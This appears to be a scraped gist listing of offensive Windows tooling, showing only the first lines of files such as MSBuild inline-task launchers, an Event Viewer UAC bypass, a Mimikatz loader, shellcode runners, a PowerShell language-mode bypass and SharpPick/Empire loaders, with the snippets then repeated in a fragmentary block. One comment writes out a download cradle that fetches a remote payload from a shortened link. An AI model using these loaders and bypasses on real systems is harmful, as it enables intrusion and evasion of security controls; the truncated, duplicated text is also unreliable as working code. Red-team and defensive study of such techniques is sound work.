Dave Hardy davehardy20

## msbuilder.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuilder.xml -->
  <!-- Populate the Env Var like this or many other ways: -->
  <!-- $env:TheThingIs = (New-Object Net.Webclient).downloadstring('http://bit.ly/2tDkg2e') -->
  <!-- This has the advantage of keeping the assembly out of the xml on disk if it were ever recovered -->
  <!-- This is just a simple example... MSBuild is a rich scripting engine with lots of abiltiy to customize the build process -->
  <Target Name="Hello">
    <SharpLauncher >
    </SharpLauncher>

## EventVwrBypass.cs
using System;
using System.Linq;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;

using Microsoft.Win32;
/*
InstallUtil.exe C# version of Event Viewer UAC bypass

## katz.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml -->
  <Target Name="Hello">
    <SharpLauncher >
    </SharpLauncher>
  </Target>
  <UsingTask
    TaskName="SharpLauncher"
    TaskFactory="CodeTaskFactory"

## PoCPowerShellCoreShellcodeRunner.ps1
<#
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
#>

function Invoke-VirtualAlloc {
    Param (
        [IntPtr] $lpAddress,
        [UInt32] $dwSize,
        [UInt32] $flAllocationType,

## evil.cs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;

namespace Export
{
    class Test
    {

## shellcode.js
import System;
import System.Runtime.InteropServices;
import System.Reflection;
import System.Reflection.Emit;
import System.Runtime;
import System.Text;

//C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js


## Remove-ConstrainedLanguageMode.psm1
function Remove-ConstrainedLanguageMode {
<#
.Synopsis
Set language mode for a powershell session to 'full'.

.Description
Set language mode for a powershell session to 'full'. Leverages 'InstallUtil'
and the Microsoft.Diagnostics.Runtime.dll resouces to adjust in memory values.

.Example

## EmpireSCT.cs
/*
 * SharpPick aka InexorablePoSH
 * Description: Application to load and run powershell code via the .NET assemblies
 * License: 3-Clause BSD License. See Veil PowerTools Project
 *
 * This application is part of Veil PowerTools, a collection of offensive PowerShell
 * capabilities. Hope they help!
 *
 * This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe
 */

## EmpireDLL.cs
/*
 * SharpPick aka InexorablePoSH
 * Description: Application to load and run powershell code via the .NET assemblies
 * License: 3-Clause BSD License. See Veil PowerTools Project
 *
 * This application is part of Veil PowerTools, a collection of offensive PowerShell
 * capabilities. Hope they help!
 *
 * This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe
 */

## SharpPick.cs
/*
 * SharpPick aka InexorablePoSH
 * Description: Application to load and run powershell code via the .NET assemblies
 * License: 3-Clause BSD License. See Veil PowerTools Project
 *
 * This application is part of Veil PowerTools, a collection of offensive PowerShell
 * capabilities. Hope they help!
 *
 * This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe
 */
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- This inline task executes c# code. -->
	<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuilder.xml -->
	<!-- Populate the Env Var like this or many other ways: -->
	<!-- $env:TheThingIs = (New-Object Net.Webclient).downloadstring('http://bit.ly/2tDkg2e') -->
	<!-- This has the advantage of keeping the assembly out of the xml on disk if it were ever recovered -->
	<!-- This is just a simple example... MSBuild is a rich scripting engine with lots of abiltiy to customize the build process -->
	<Target Name="Hello">
	<SharpLauncher >
	</SharpLauncher>
	using System;
	using System.Linq;
	using System.Reflection;
	using System.Configuration.Install;
	using System.Runtime.InteropServices;

	using Microsoft.Win32;
	/*
	InstallUtil.exe C# version of Event Viewer UAC bypass
	<#
	Author: Matthew Graeber (@mattifestation)
	License: BSD 3-Clause
	#>

	function Invoke-VirtualAlloc {
	Param (
	[IntPtr] $lpAddress,
	[UInt32] $dwSize,
	[UInt32] $flAllocationType,
	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using RGiesecke.DllExport;

	namespace Export
	{
	class Test
	{
	import System;
	import System.Runtime.InteropServices;
	import System.Reflection;
	import System.Reflection.Emit;
	import System.Runtime;
	import System.Text;

	//C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js
	//C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js
	/*
	* SharpPick aka InexorablePoSH
	* Description: Application to load and run powershell code via the .NET assemblies
	* License: 3-Clause BSD License. See Veil PowerTools Project
	*
	* This application is part of Veil PowerTools, a collection of offensive PowerShell
	* capabilities. Hope they help!
	*
	* This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe
	*/